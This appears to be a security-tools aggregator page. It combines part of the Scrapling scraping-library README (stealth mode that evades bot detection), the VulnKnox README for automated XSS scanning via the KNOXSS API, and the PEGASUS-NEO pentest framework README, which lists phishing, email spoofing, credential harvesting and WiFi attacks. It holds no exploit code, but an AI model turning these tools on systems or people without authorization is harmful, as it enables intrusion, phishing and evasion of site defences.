  • network_idle: Wait for the page until there are no network connections for at least 500 ms.
  • timeout: The timeout in milliseconds used in all operations and waits on the page. The default is 30000.
  • wait_selector: Wait for a specific css selector to be in a specific state.
  • proxy: The proxy to be used with requests; it can be a string or a dictionary with the keys 'server', 'username', and 'password' only.
  • os_randomize: If enabled, Scrapling will randomize the OS fingerprints used. The default is Scrapling matching the fingerprints with the current OS.
  • wait_selector_state: The state to wait for the selector given with wait_selector. The default state is 'attached'.

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

PlayWrightFetcher

This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: all requests done by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)

Using this Fetcher class, you can make requests with:
  1. Vanilla Playwright without any modifications other than the ones you chose.
  2. Stealthy Playwright with the stealth mode I wrote for it. It's still a WIP, but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include:
    • Patching the CDP runtime fingerprint.
    • Mimicking some of the real browsers' properties by injecting several JS files and using custom options.
    • Using custom flags on launch to hide Playwright even more and make it faster.
    • Generating real browser headers of the same type and same user OS, then appending them to the request's headers.
  3. Real browsers, by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher; most of the options can be enabled on it.
  4. NSTBrowser's docker browserless option, by passing the CDP URL and enabling the nstbrowser_mode option.

Note: using the real_chrome argument requires that you have the Chrome browser installed on your device

Add that to a lot of controlling/hiding options as you will see in the arguments list below.

Here is the complete list of arguments:

  • url (required): Target url.
  • headless: Pass True to run the browser in headless/hidden mode (default), or False for headful/visible mode.
  • disable_resources: Drop requests of unnecessary resources for a speed boost. It depends, but it made requests ~25% faster in my tests for some websites. Requests dropped are of type font, image, media, beacon, object, imageset, texttrack, websocket, csp_report, and stylesheet. This can help save your proxy usage, but be careful with this option, as it makes some websites never finish loading.
  • useragent: Pass a useragent string to be used. Otherwise the fetcher will generate a real useragent of the same browser and use it.
  • network_idle: Wait for the page until there are no network connections for at least 500 ms.
  • timeout: The timeout in milliseconds used in all operations and waits on the page. The default is 30000.
  • page_action: Added for automation. A function that takes the page object, does the automation you need, then returns page again.
  • wait_selector: Wait for a specific css selector to be in a specific state.
  • wait_selector_state: The state to wait for the selector given with wait_selector. The default state is 'attached'.
  • google_search: Enabled by default; Scrapling will set the referer header to be as if this request came from a Google search for this website's domain name.
  • extra_headers: A dictionary of extra headers to add to the request. The referer set by the google_search argument takes priority over the referer set here if used together.
  • proxy: The proxy to be used with requests; it can be a string or a dictionary with the keys 'server', 'username', and 'password' only.
  • hide_canvas: Add random noise to canvas operations to prevent fingerprinting.
  • disable_webgl: Disables WebGL and WebGL 2.0 support entirely.
  • stealth: Enables stealth mode; always check the documentation to see what stealth mode does currently.
  • real_chrome: If you have the Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it.
  • locale: Set the locale for the browser if wanted. The default value is en-US.
  • cdp_url: Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP.
  • nstbrowser_mode: Enables NSTBrowser mode; it has to be used with the cdp_url argument or it will be completely ignored.
  • nstbrowser_config: The config you want to send with requests to the NSTBrowser. If left empty, Scrapling defaults to an optimized NSTBrowser docker browserless config.

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<div class="tags"> Tags: <meta class="ke...' parent='<div class="quote" itemscope itemtype="h...'>]

>>> quote.siblings
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

>>> quote.next # gets the next element, the same logic applies to `quote.previous`
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>

>>> quote.children.css_first(".author::text")
'Albert Einstein'

>>> quote.has_class('quote')
True

# Generate new selectors for any element
>>> quote.generate_css_selector
'body > div > div:nth-of-type(2) > div > div'

# Test these selectors on your favorite browser or reuse them again in the library's methods!
>>> quote.generate_xpath_selector
'//body/div/div[2]/div/div'

If your case needs more than the element's parent, you can iterate over the whole ancestors' tree of any element like below

for ancestor in quote.iterancestors():
    # do something with it...

You can search for a specific ancestor of an element that satisfies a function, all you need to do is to pass a function that takes an Adaptor object as an argument and return True if the condition satisfies or False otherwise like below:

>>> quote.find_ancestor(lambda ancestor: ancestor.has_class('row'))
<data='<div class="row"> <div class="col-md-8">...' parent='<div class="container"> <div class="row...'>

Content-based Selection & Finding Similar Elements

You can select elements by their text content in multiple ways, here's a full example on another website:

>>> page = Fetcher().get('https://books.toscrape.com/index.html')

>>> page.find_by_text('Tipping the Velvet') # Find the first element whose text fully matches this text
<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>

>>> page.urljoin(page.find_by_text('Tipping the Velvet').attrib['href']) # We use `page.urljoin` to return the full URL from the relative `href`
'https://books.toscrape.com/catalogue/tipping-the-velvet_999/index.html'

>>> page.find_by_text('Tipping the Velvet', first_match=False) # Get all matches if there are more
[<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]

>>> page.find_by_regex(r'£[\d\.]+') # Get the first element that its text content matches my price regex
<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>

>>> page.find_by_regex(r'£[\d\.]+', first_match=False) # Get all elements that matches my price regex
[<data='<p class="price_color">£51.77</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£53.74</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£50.10</p>' parent='<div class="product_price"> <p class="pr...'>,
<data='<p class="price_color">£47.82</p>' parent='<div class="product_price"> <p class="pr...'>,
...]

Find all elements that are similar to the current element in location and attributes

# For this case, ignore the 'title' attribute while matching
>>> page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])
[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
        print({
            "name": product.css_first('h3 a::text'),
            "price": product.css_first('.price_color').re_first(r'[\d\.]+'),
            "stock": product.css('.availability::text')[-1].clean()
        })
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
  <section class="products">
    <article class="product" id="p1">
      <h3>Product 1</h3>
      <p class="description">Description 1</p>
    </article>
    <article class="product" id="p2">
      <h3>Product 2</h3>
      <p class="description">Description 2</p>
    </article>
  </section>
</div>

And you want to scrape the first product, the one with the p1 ID. You will probably write a selector like this

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com', auto_match=True)  # enable auto-matching on initialization (see the notes below)
element = page.css('#p1', auto_save=True)
if not element: # One day the website changes?
    element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.

Real-World Scenario

Let's use a real website as an example and use one of the fetchers to fetch its source. To do this, we need to find a website that will change its design/structure soon, take a copy of its source, and then wait for the website to make the change. Of course, that's nearly impossible to know in advance unless I know the website's owner, but that would make it a staged test, haha.

To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverFlow's website in 2010, pretty old huh? Let's test if the auto-matching feature can extract the same button from the old 2010 design and the current design using the same selector :)

If I want to extract the Questions button from the old design, I can use a selector like this: `#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a`. This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions:

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'

Note that I used a new argument called automatch_domain. This is because, to Scrapling, these are two different URLs rather than the same website, so it would isolate their auto-match data. To tell Scrapling they are the same website, we pass the domain we want to use for saving the auto-match data for both of them so Scrapling doesn't isolate them.

In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)

Notes:

  1. For the two examples above, I used the Adaptor class the first time and the Fetcher class the second time, just to show that you can create the Adaptor object yourself if you already have the source, or fetch the source using any Fetcher class and it will create the Adaptor object for you.
  2. Passing the auto_save argument while the auto_match argument is set to False during initialization of the Adaptor/Fetcher object will result in auto_save being ignored, along with this warning message: Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons, so the database gets created/connected only when you plan to use the auto-matching features. The same applies to the auto_match argument.

  3. The auto_match parameter works only on Adaptor instances, not Adaptors (element lists), so code like `page.css('body').css('#p1', auto_match=True)` will raise an error because you can't auto-match a whole list. You have to be specific and do something like `page.css_first('body').css('#p1', auto_match=True)`.

Find elements by filters

Inspired by BeautifulSoup's find_all function, you can find elements by using the find_all/find methods. Both methods can take multiple types of filters and return all elements on the page that match all of them.

To be more specific:
  • Any string passed is considered a tag name
  • Any iterable passed like List/Tuple/Set is considered an iterable of tag names.
  • Any dictionary is considered a mapping of HTML element(s) attribute names and attribute values.
  • Any regex patterns passed are used as filters to elements by their text content
  • Any functions passed are used as filters
  • Any keyword argument passed is considered as an HTML element attribute with its value.

So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements whose text content matches all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote` and that contain a `.text` element whose content includes the word 'world'.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in their content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex (note: requires `import re`)
>> import re
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object itself of any element directly:

quote._root
# <Element div at 0x107f98870>

  • Saving and retrieving elements manually to auto-match them outside the css and the xpath methods, but you have to set the identifier yourself.

  • To save an element to the database:

element = page.find_by_text('Tipping the Velvet', first_match=True)
page.save(element, 'my_special_element')

  • Later, when you want to retrieve it and relocate it inside the page with auto-matching, it looks like this:

element_dict = page.retrieve('my_special_element')
page.relocate(element_dict, adaptor_type=True)
# [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>]
page.relocate(element_dict, adaptor_type=True).css('::text')
# ['Tipping the Velvet']

  • If you want to keep it as an lxml.etree object, leave out the adaptor_type argument:

page.relocate(element_dict)
# [<Element a at 0x105a2a7b0>]

  • Filtering results based on a function

# Find all products over $50
expensive_products = page.css('.product_pod').filter(
    lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
  • Searching results for the first one that matches a function
# Find the first product with price '54.23'
page.css('.product_pod').search(
    lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
  • Doing operations on element content is the same as in Scrapy:

quote.re(r'regex_pattern')       # Get all strings (TextHandlers) that match the regex pattern
quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only
quote.json()                     # If the content text is JSON-able, convert it to JSON using `orjson`, which is 10x faster than the standard json library and provides more options

    except that you can do more with them, like:

quote.re(
    r'regex_pattern',
    replace_entities=True, # Character entity references are replaced by their corresponding character
    clean_match=True,      # Ignore all whitespaces and consecutive spaces while matching
    case_sensitive=False,  # Set the regex to ignore letter case while compiling it
)

    All of these are methods of the TextHandler that holds the text content, so the same can be done directly if you call the .text property or the equivalent selector function.

  • Operations on the text content itself include:

  • Cleaning the text of any whitespace and replacing consecutive spaces with a single space: `quote.clean()`
  • You already know about the regex matching and the fast JSON parsing, but did you know that all strings returned from a regex search are TextHandler objects too? So if, for example, you have a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to a JSON object, in other libraries this would take more than one line of code, but here it's one line: `page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()`
  • Sorting all characters in the string as if it were a list and returning the new string: `quote.sort(reverse=False)`

    To be clear, TextHandler is a sub-class of Python's str so all normal operations/methods that work with Python strings will work with it.

  • An element's attributes are not exactly a dictionary but a read-only sub-class of mapping called AttributesHandler, which makes it faster. The string values returned are actually TextHandler objects, so all the operations above can be done on them, along with standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can also search by values and do partial searches. It might be handy in some cases (returns a generator of matches):

>>> for item in element.attrib.search_values('catalogue', partial=True):
        print(item)
{'href': 'catalogue/tipping-the-velvet_999/index.html'}

  • Serialize the current attributes to JSON bytes:

>>> element.attrib.json_string
b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'

  • Convert it to a normal dictionary:

>>> dict(element.attrib)
{'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

A lot of deep details are skipped here to keep this as short as possible, so to take a deep dive, head to the docs section. I will try to keep it as up to date as possible and add complex examples. There I will explain points like how to write your own storage system, how to write spiders that don't depend on selectors at all, and more...

Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚡ Enlightening Questions and FAQs

This section addresses common questions about Scrapling; please read it before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with methods css or xpath with the auto_save parameter set to True before structural changes happen.
  2. Before returning results for you, Scrapling uses its configured database and saves unique properties about that element.
  3. Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:

    1. The domain of the URL you gave while initializing the first Adaptor object
    2. The identifier parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.

    Together, both are used to retrieve the element's unique properties from the database later.

  4. Later, when you enable the auto_match parameter for both the Adaptor instance and the method call, the element's properties are retrieved and Scrapling loops over all elements on the page, compares each one's unique properties to the ones already saved for this element, and calculates a score for each.
  5. Comparing elements is not exact; it is about how similar the values are, so everything is taken into consideration, even the order of values, like the order in which the element's class names were written before versus how the same class names are written now.
  6. The score for each element is stored in a table, and the element(s) with the highest combined similarity scores are returned.
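Put together, the typical save-then-match flow looks something like this minimal sketch (the URL, selector, and identifier are placeholders, and it assumes auto_match is enabled at initialization as the notes above describe):

from scrapling.fetchers import Fetcher

# First run, while the old selector still works: save the element's unique properties
page = Fetcher(auto_match=True).get('https://example.com')
element = page.css_first('#p1', auto_save=True, identifier='first-product')

# A later run, after the structure changed: relocate the element from the saved properties
page = Fetcher(auto_match=True).get('https://example.com')
element = page.css_first('#p1', auto_match=True, identifier='first-product')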

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

Not a big problem, as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you later use the same identifier for a different website whose URL you also didn't pass while initializing; in that case the save process will overwrite the previous data, and auto-matching uses only the latest saved properties.

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract:

  • The element's tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only).
  • The element's parent tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object results in that argument being ignored. This behavior is purely for performance reasons, so the database gets created only when you plan to use the auto-matching features.

I have done everything as in the docs, but auto-matching didn't return anything. What's wrong?

It could be one of these reasons:

  1. No data was saved/stored for this element before.
  2. The selector passed is not the one used while storing the element's data. The solution is simple (see the sketch after this list):
     • Pass the old selector again as an identifier to the method called.
     • Or retrieve the element with the retrieve method using the old selector as the identifier, then save it again with the save method and the new selector as the identifier.
     • Start using the identifier argument more often if you plan to keep switching to new selectors from now on.
  3. The website had some extreme structural changes, like a full redesign. If this happens a lot with a website, the solution is to make your code as selector-free as possible using Scrapling's features.
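For the second reason, here is a minimal sketch of the recovery options described above, assuming the element was originally saved through the selector '#old-selector' and `page` is a page object with auto-matching enabled:

# Option 1: keep using the old selector string as the identifier while selecting with the new selector
element = page.css_first('#new-selector', auto_match=True, identifier='#old-selector')

# Option 2: migrate the stored data once, then use the new selector as the identifier from now on
element_dict = page.retrieve('#old-selector')                 # stored unique properties
element = page.relocate(element_dict, adaptor_type=True)[0]   # relocate it in the current page
page.save(element, '#new-selector')                           # re-save under the new identifier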

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.

More Sponsors!

Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under BSD-3

Acknowledgments

This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, only the unique properties of the first element from the selection results get saved. So if the selector you are using matches different elements in different locations on the page, auto-matching will probably return only the first element when you relocate it later. This doesn't apply to combined CSS selectors (using commas to combine more than one selector, for example), as those selectors get separated and each one is executed alone.

Designed & crafted with ❤️ by Karim Shoair.



Cisco XDR Just Changed the Game, Again

Clear verdict. Decisive action. AI speed. Cisco XDR turns noise into clarity and alerts into action—enabling confident, timely response at scale.

VulnKnox - A Go-based Wrapper For The KNOXSS API To Automate XSS Vulnerability Testing

By: Unknown


VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.


Features

  • Supports pipe input for passing file lists and echoing URLs for testing
  • Configurable retries and timeouts
  • Supports GET, POST, and BOTH HTTP methods
  • Advanced Filter Bypass (AFB) feature
  • Flash Mode for quick XSS polyglot testing
  • CheckPoC feature to verify the proof of concept
  • Concurrent processing with configurable parallelism
  • Custom headers support for authenticated requests
  • Proxy support
  • Discord webhook integration for notifications
  • Detailed output with color-coded results

Installation

go install github.com/iqzer0/vulnknox@latest

Configuration

Before using the tool, you need to set up your configuration:

API Key

Obtain your KNOXSS API key from knoxss.me.

On the first run, a default configuration file will be created at:

Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE with your actual API key.

Discord Webhook (Optional)

If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.

Usage

Usage of vulnknox:

-u Input URL to send to KNOXSS API
-i Input file containing URLs to send to KNOXSS API
-X GET HTTP method to use: GET, POST, or BOTH
-pd POST data in format 'param1=value&param2=value'
-headers Custom headers in format 'Header1:value1,Header2:value2'
-afb Use Advanced Filter Bypass
-checkpoc Enable CheckPoC feature
-flash Enable Flash Mode
-o The file to save the results to
-ow Overwrite output file if it exists
-oa Output all results to file, not just successful ones
-s Only show successful XSS payloads in output
-p 3 Number of parallel processes (1-5)
-t 600 Timeout for API requests in seconds
-dw Discord Webhook URL (overrides config file)
-r 3 Number of retries for failed requests
-ri 30 Interval between retries in seconds
-sb 0 Skip domains after this many 403 responses
-proxy Proxy URL (e.g., http://127.0.0.1:8080)
-v Verbose output
-version Show version number
-no-banner Suppress the banner
-api-key KNOXSS API Key (overrides config file)

Basic Examples

Test a single URL using GET method:

vulnknox -u "https://example.com/page?param=value"

Test a URL with POST data:

vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1&param2=value2"

Enable Advanced Filter Bypass and Flash Mode:

vulnknox -u "https://example.com/page?param=value" -afb -flash

Use custom headers (e.g., for authentication):

vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"

Process URLs from a file with 5 concurrent processes:

vulnknox -i urls.txt -p 5

Send notifications to Discord on successful XSS findings:

vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"

Advanced Usage

Test both GET and POST methods with CheckPoC enabled:

vulnknox -u "https://example.com/page" -X BOTH -checkpoc

Use a proxy and increase the number of retries:

vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5

Suppress the banner and only show successful XSS payloads:

vulnknox -u "https://example.com/page?param=value" -no-banner -s

Output Explanation

[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.

The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.

Contributing

Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.

License

This project is licensed under the MIT License.

Credits

@KN0X55
@BruteLogic
@xnl_h4ck3r



PEGASUS-NEO - A Comprehensive Penetration Testing Framework Designed For Security Professionals And Ethical Hackers. It Combines Multiple Security Tools And Custom Modules For Reconnaissance, Exploitation, Wireless Attacks, Web Hacking, And More

By: Unknown



PEGASUS-NEO Penetration Testing Framework

 

🛡️ Description

PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.

⚠️ Legal Disclaimer

This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.

Developers assume no liability and are not responsible for any misuse or damage caused by this program.

🔒 Copyright Notice

PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.

This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.

Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024

🌟 Features

Password: Sobri

  • Reconnaissance & OSINT
  • Network scanning
  • Email harvesting
  • Domain enumeration
  • Social media tracking

  • Exploitation & Pentesting

  • Automated exploitation
  • Password attacks
  • SQL injection
  • Custom payload generation

  • Wireless Attacks

  • WiFi cracking
  • Evil twin attacks
  • WPS exploitation

  • Web Attacks

  • Directory scanning
  • XSS detection
  • SQL injection
  • CMS scanning

  • Social Engineering

  • Phishing templates
  • Email spoofing
  • Credential harvesting

  • Tracking & Analysis

  • IP geolocation
  • Phone number tracking
  • Email analysis
  • Social media hunting

🔧 Installation

# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git

# Change directory
cd pegasus-neo

# Install dependencies
sudo python3 -m pip install -r requirements.txt

# Run the tool
sudo python3 pegasus_neo.py

📋 Requirements

  • Python 3.8+
  • Linux Operating System (Kali/Ubuntu recommended)
  • Root privileges
  • Internet connection

🚀 Usage

  1. Start the tool:
sudo python3 pegasus_neo.py
  2. Enter the authentication password
  3. Select a category from the main menu
  4. Choose a specific tool or module
  5. Follow the on-screen instructions

🔐 Security Features

  • Source code protection
  • Integrity checking
  • Anti-tampering mechanisms
  • Encrypted storage
  • Authentication system

🛠️ Supported Tools

Reconnaissance & OSINT

  • Nmap
  • Wireshark
  • Maltego
  • Shodan
  • theHarvester
  • Recon-ng
  • SpiderFoot
  • FOCA
  • Metagoofil

Exploitation & Pentesting

  • Metasploit
  • SQLmap
  • Commix
  • BeEF
  • SET
  • Hydra
  • John the Ripper
  • Hashcat

Wireless Hacking

  • Aircrack-ng
  • Kismet
  • WiFite
  • Fern Wifi Cracker
  • Reaver
  • Wifiphisher
  • Cowpatty
  • Fluxion

Web Hacking

  • Burp Suite
  • OWASP ZAP
  • Nikto
  • XSStrike
  • Wapiti
  • Sublist3r
  • DirBuster
  • WPScan
